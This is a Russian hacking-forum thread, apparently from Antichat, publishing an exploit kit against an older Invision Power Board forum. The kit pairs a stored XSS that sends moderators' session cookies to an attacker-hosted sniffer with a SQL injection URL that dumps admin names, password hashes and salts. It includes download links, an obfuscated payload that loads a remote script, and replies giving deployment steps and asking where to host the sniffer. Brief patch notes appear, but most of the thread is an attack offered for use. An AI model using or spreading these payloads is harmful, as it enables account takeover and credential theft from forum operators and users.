----[ NITRO ... ]

Эта уязвимость была найдена с года два назад да и патч к ней уже существует год , форумов с этой версией становится все меньше а это значит что пора опубликовать рабочий эксплоит . Суть его работы состоит в сборе сессий юзеров с помощью активной xss иньекции , размещенной самим юзером , и получении данных с помощью SQL иньекции. Эксплоит состоит из нескольких частей - генератор активной xss , javascript файл , который будет вызван при посещении страницы с xss , просмотрщик логов и компонент , который извлечет данные из MySQL таблицы форума нужные данные в случае если перехваченная сессипринадлежала человеку с правами модератора.

----[ ACTIVE XSS ... ]

Скрипт xss.php , входящий в состав пакета , сгенерирует xss для последующего размещения ее в теме . В качестве ссылки следует указать полный путь до файла ya.js ( в котором вы уже предварительно исправили путь на свой ) , скорей всего останется всего лишь нажать на кнопку так как путь уже выставлен програмно .


◄■■■■■■■■■■■■■■■■■■■■■■■■■■■►
■■■■ Введите ссылку { url } ■■■■
■■■■ Результат { xss code } ■■■■
◄■■■■■■■■■■■■■■■■■■■■■■■■■■■►


Патч

sources/classes/bbcode/class_bbcode_core.php, Function "regex_check_image", line 924:

1. $default = "".$url."";
$default = "".str_replace( '[', '[', $url )."";
2. if ( preg_match( "/[?&;]/", $url) )
if ( preg_match( "/[?&;\<\[]/", $url) )

sources/classes/bbcode/class_bbcode_core.php, Function "post_db_parse_bbcode", line 486

1.preg_match_all( "#(\[$preg_tag\])((?!\[/$preg_tag\]).+?)?(\[/$preg_tag\])#si", $t, $match );
preg_match_all( "#(\[$preg_tag\])((?!\[/$preg_tag\]).+?)?(\[/$preg_tag\])#si", $t, $match );

if ( $row['bbcode_tag'] == 'snapback' )
{
$match[2][$i] = intval( $match[2][$i] );
}



----[ SQL INJECTION ... ]

Иньекция осуществима лишь тогда , когда имеется сессия пользователя с доступом в модераторскую панель .


?act=mod&f=-6&CODE=prune_finish&pergo=50&current=50&max=3&starter=1+union+select+1/*


Патч.Необходимо привести параметр starter к числовому виду посредством функции intval

----[ SNIFFER ... ]

Результат работы эксплоита оформлен в виде простого php cookie сниффера .


◄■■■■■■■■■■■■■■■■■■■■■■■■■■■►
■■■■ IP ADDRESS { ip } ■■■■
■■■■ REFERER { referer } ■■■■
■■■■ COOKIES { cookie } ■■■■
■■■■ USER ID { user id } ■■■■
◄■■■■■■■■■■■■■■■■■■■■■■■■■■■►


В случае удачного проведения SQL иньекции будут также представленая полная информация о администраторском составе форума


◄■■■■■■■■■■■■■■■■■■■■■■■■■■■►
■■■■ IP ADDRESS { ip } ■■■■
■■■■ REFERER { referer } ■■■■
■■■■ COOKIES { cookie } ■■■■
■■■■ USER ID { user id } ■■■■
■■■■ ADMIN NAME { } ■■■■
■■■■ ADMIN PASS { } ■■■■
■■■■ ADMIN SALT { } ■■■■
◄■■■■■■■■■■■■■■■■■■■■■■■■■■■►


----[ EOF ... ]

Выражаю большую благодарность лицам из закрытых разделов Античата , а также всем кто меня знает и не знает , тем кто дышал и не дышал в этот момент за поддержку . Скорей всего скрипт не работает или работает не так как надо . Вся информация указана выше . Надеюсь скоро линк умрет и тема будет удалена xD

www.underwater.itdefence.ru/isniff.rar
http://www.milw0rm.com/exploits/4841

Евгений Минаев

Большое спасибо только я одного не понял
почему ты это не запостил в закреплёной теме ipb
удобней же когда все в одном месте .

str_replace( '[', '[', $url )
смысл?

Мне можно тут выложить фикс кода или это сделано спецально?

Doom123, написали что фикс существует уже год....
Найдут кому надо...

Хм... Попробовал на локалхосте- XSS действительно работает. Подменил куки - F5 - и я уже модер. Только вот не получается провести инъекцию- как заюзать скрипт exploit.php? :confused:

Isis, Фикс в самом сплоите от иньекцию криво делает соль не правельную выводит... я и хотел фикс выставить ток не знал еси эт спецально сделано...

Патч мутим для замазки уязвимости?
Обьясните как сделать Sql Injection подробнее...

Подскажите бесплатный хостинг где можно разместить сниффер(где пробывал не работает).

Подскажите бесплатный хостинг где можно разместить сниффер(где пробывал не работает).
Вот тебе решение без геммороя _http://na-s/ru
--------------------------------
Народ дайте пожалуйста эксплойт перловый для IPB 2.1.X версий,к нему прикручин GUI интерфейс,и кажись называеться r57ipb... что-то такое,ну вообщем,буду благодарен!

Вот тебе решение без геммороя
http://na-s.ru/

пага нереально долго грузится :( , у тебя нормально сервис работает?

Народ дайте пожалуйста эксплойт перловый для IPB 2.1.X версий,к нему прикручин GUI интерфейс,и кажись называеться r57ipb... что-то такое,ну вообщем,буду благодарен!

http://www.milw0rm.com/exploits/2010

Все предельно просто. Допустим наш снифер находится по адресу localhost/sniff/, а форум - test.ru/forum/

Открываем ya.js блокнтом, правим путь до host/path/ya.gif , в данном случае пишем http://localhost/sniff/ya.gif, на файл data.txt выставляем права 666.
Затем заходим на xss.php и прописываем полный путь http://localhost/sniff/ya.js и жмем кнопку - попробуй ее не найти она там одна - и получаем код.
Нашим юзером заходим на форум, постим это сообщение и ждем когда его прочитают модеры.
В случае если ктото с модераторскими - или выше - правами зайдет в нашу тему, скрипт получит хеши и соли всего администраторского состава, все это вы можете посмотреть на view.php

www.underwater.itdefence.ru/isniff.rar
www.milw0rm.com/sploits/2008-isniff.rar

Сделал пост.
Не сработало.
Форум изменил код на:
<img src="http://www.ya.ru/ onerror=script=document.createElement(String.fromC harCode(115,99,114,105,112,116)),script.src=/http:xxzamenil.zamenil.ruxsniffxya.js/.source.replace(/x/g,String.fromCharCode(47)),head=document.getElemen tsByTagName(String.fromCharCode(104,101,97,100)).i tem(0),head.appendChild(script) style=visibility:hidden =.gif" border="0" alt="Изображение" />

Форум пропатченный?
Я правильно понимаю, что нужно искать другую уязвимость?
Я новичек.

перезалейте файл http://www.underwater.itdefence.ru/isniff.rar